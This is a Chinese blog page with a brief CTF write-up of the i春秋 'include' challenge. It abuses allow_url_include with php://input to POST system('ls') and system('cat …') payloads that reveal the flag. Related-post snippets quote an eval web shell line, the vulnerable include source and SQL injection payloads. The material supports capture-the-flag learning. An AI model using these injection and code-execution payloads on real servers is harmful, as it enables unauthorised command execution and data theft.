i春秋-web-include

最新推荐文章于 2022-02-13 15:38:15 发布
最新推荐文章于 2022-02-13 15:38:15 发布
阅读量578 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41173457/article/details/82949701
本文揭示了一种利用PHP的allow_url_include配置项被开启的漏洞,通过POST请求发送包含system函数调用的PHP代码,成功执行了ls和cat命令,最终从dle345aae.php文件中读取到了Flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phpinfo内容
发现allow_url_include开启
即允许php://input的形式,并将post的数据,作为php代码执行
?path=php://input
post:<?php system("ls");?>
得到
dle345aae.php index.php phpinfo.php
猜测flag应该在dle345aae.php里面
post:<?php system("cat dle345aae.php");?>
查看源代码 发现flag

woy66
关注
Web-SQLi[i春秋][200pt]
Laurel_60的博客
08-04 1417
打开网址,是个登陆界面。 根据题目,第一反应–怕不是sql注入哦!经过尝试之后会发现,username=admin时,返回的是password error。ok,日常抓包,然后用intruder看看有没有字符被过滤掉。 事实证明,这个%有着大大的问题。拜读了网上的各种wp之后,原来是spintf()函数格式化字符串,导致了单引号逃逸。通过构造- - username=admin%1$\'...
i春秋-web-Code
wojiushilsy的博客
04-14 347
题目要点题目内容解题 题目要点 文件包含 脑洞 题目内容 解题 打开页面,是一张base64加密的动漫图片 在URL中可以看到图片名 尝试访问index源码(修改 hei.jpg 为 index.php ),得到base64加密的源码。 解密得到如下代码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time:...
i春秋 WEB include
A_dmin的博客
06-12 1612
i春秋 WEB include 一天一道CTF题目,能多不能少 打开网页发现源码,而且什么都没有过滤~: <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 还出现phpinfo页面: ...
Web include <=> i春秋
LYJ20010728的博客
01-19 325
题目给的源码 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 首先,试了试直接?path=flag.php没有回显。 然后通过phpinfo给出的内容allow_url_include处于打开状态,想到利用php的伪协议。 用?path=php://input,然后POST进一段话<?
i春秋include
weixin_30701575的博客
09-02 302
打开题目,发现它提示我们有个phpinfo.php,所以我们直接访问,没有什么特殊的发现,根据题目提示include,找到allow_url_include的信息 (ctrl+f直接进入网页搜索) 发现是打开的。即允许php://input的形式,所以这里使用post传输数据 构造url: http://169c1b893df145ceab40a9f940f...
i春秋Include
金 帛的博客
02-13 589
i春秋webWP
i春秋web-Login(细心、注意)
Sea_Sand息禅
05-22 1436
上来就是让登陆,尝试登录页面报错,查看源码得到:<!-- test1 test1 -->,这可能就是登录的账号和密码,果然成功,进入了member.php,但是并没有得到什么有用的信息。 刷新登录后的界面,尝试抓包进行分析,在响应头处发现: 有个show=0,难道是用来显示什么信息的?在请求部分加上show: 1 试了好几个地方,只有show加在Referer前面的时候响应部分...
i春秋CTF训练 Web include
椰奶冻不安全的博客
06-30 1333
Web include 题目内容:没错!就是文件包含漏洞。 链接需到ichunqiu网站申请 页面显示出了phpinfo.php的信息以及php源码 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 发现可以直接对path进行利用,构造path=php://input,同时post : &
i春秋 WEB code
A_dmin的博客
06-10 1489
i春秋 WEB code 一天一道CTF题目,能多不能少 打开网页入目的是一张图,查看网页源代码,发现图片是base64的加密,可能存在文件读取,尝试读取index.php的文件,得到源码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/htm...
i春秋 web“百度杯”CTF比赛 九月场-Upload & code
ChanCherry的博客
10-13 1071
“百度杯”CTF比赛 九月场Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台
i春秋-Web(一)
qwzf
09-02 1515
前言 做了几道i春秋Web题,所以总结一下。 Web1:爆破-1 题目提示:某六位变量。查看题目,发现是代码审计 <?php include "flag.php"; $a = @$_REQUEST['hello'];//以get或post传入hello,并赋值给`$a` if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹...
i春秋【SQL】
weixin_44722125的博客
05-21 533
看几列 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,2,3--+ 爆数据库 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ic...
i春秋登录
weixin_30701575的博客
09-16 1318
打开是个普普通通的表单提交网页 查看源码,没什么东西 抓包试试再 没找到什么有用的信息 尝试注入 用户名admin’or ‘1’=’1 密码随便输 弹出密码错误 再试试admin’or ‘1’=’2 弹出用户不存在 说明这里存在注入点,而且是盲注 构造payload:admin' or user() regexp '^a'%23 (使用java的正则表达式来进行盲...
春秋web题目解题及思路汇总(自用搜集)
Devil_B的博客
05-12 1515
(Misc-Web)爆破-2 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 题目知识点: file_get_contents(path)函数,获得指定路径下的文件内容,以字符串的形式返回出来。 eval(str)函数,把括号里的字符串,当作php命令来执行。 解题思路: 这一题,把一个file_get_contents()函数命令赋值给$a传入var
i春秋Login
weixin_30701575的博客
08-07 406
打开是个很普通的登录网页 查看源码看看有没有东西 找到绿色的提示,可能是账号密码,试试 成功进来了,再右键源码,没东西。。。抓包试试,传repeater里go一下 发现一个奇怪的变量,在request中传入其他值试试 show:1 Go一下,弹出一堆flag获取信息 <?php include 'common.php'; $re...
i春秋春秋争霸
NeverLand
02-14 2774
这套题其实涉及技术方面比较少,都是些脑洞题,关键点是要学会思考题意+百度吧。感觉这套题出的没有戏说春秋好,不难,花了半小时(时间都在试+baidu上)~ 第一关 一看~洛书~然后就没有然后了~ 答案:15 第二关 根据提示还是洛书相关,四位全是[阴,阳]的密码。洛书的答案是15,想到大圈小圈,可能是二进制,15的二进制是1111,对比阴阳,1=阳,0=阴。
i春秋_真的很简单_过程记录(坑吐了。。。)
等风来
09-19 9989
0x01 打开实验环境,根据提示打开实验工具dedeCMS (坑一) 等等,我的工具呢???在实验环境里提供的工具中有个dedecms5.7但是不好用啊 WTF??? 实在不行去网上搜了下攻略,发现要自己下载dedecms,一点提示都没有,,,好坑啊 如图,得到网站管理员账号密码 后面的明显是md5加密后的密码,不过数了数只有20位,百度后得知dedecms的特点就是这样 在线破...
i春秋-敲击-flag{xvzoc}
hkk1151043545的博客
11-01 788
方方格格,不断敲击 “wdvtdz qsxdr werdzxc esxcfr uygbn” flag格式为:flag{小写的字符串} 密文全是小写字母,提示是方格、敲击,想到经常使用的九键键盘,但是这样 26 个字母对应九键有点不对,那就可能是 26 键。 迟迟找不到规律,发呆的时候,想看一下敲击键盘的规律,结果发现敲击顺序会形成字母 分别对应 x v z o c ...
利用html-include-element组件轻松实现HTML内容嵌入
npm i html-include-element ``` 安装成功后,开发者可以使用npm包中包含的JavaScript文件来在项目中引入`<html-include>`元素。 ### 结语 通过上述介绍,我们可以看到`<html-include>`组件如何利用Web组件技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值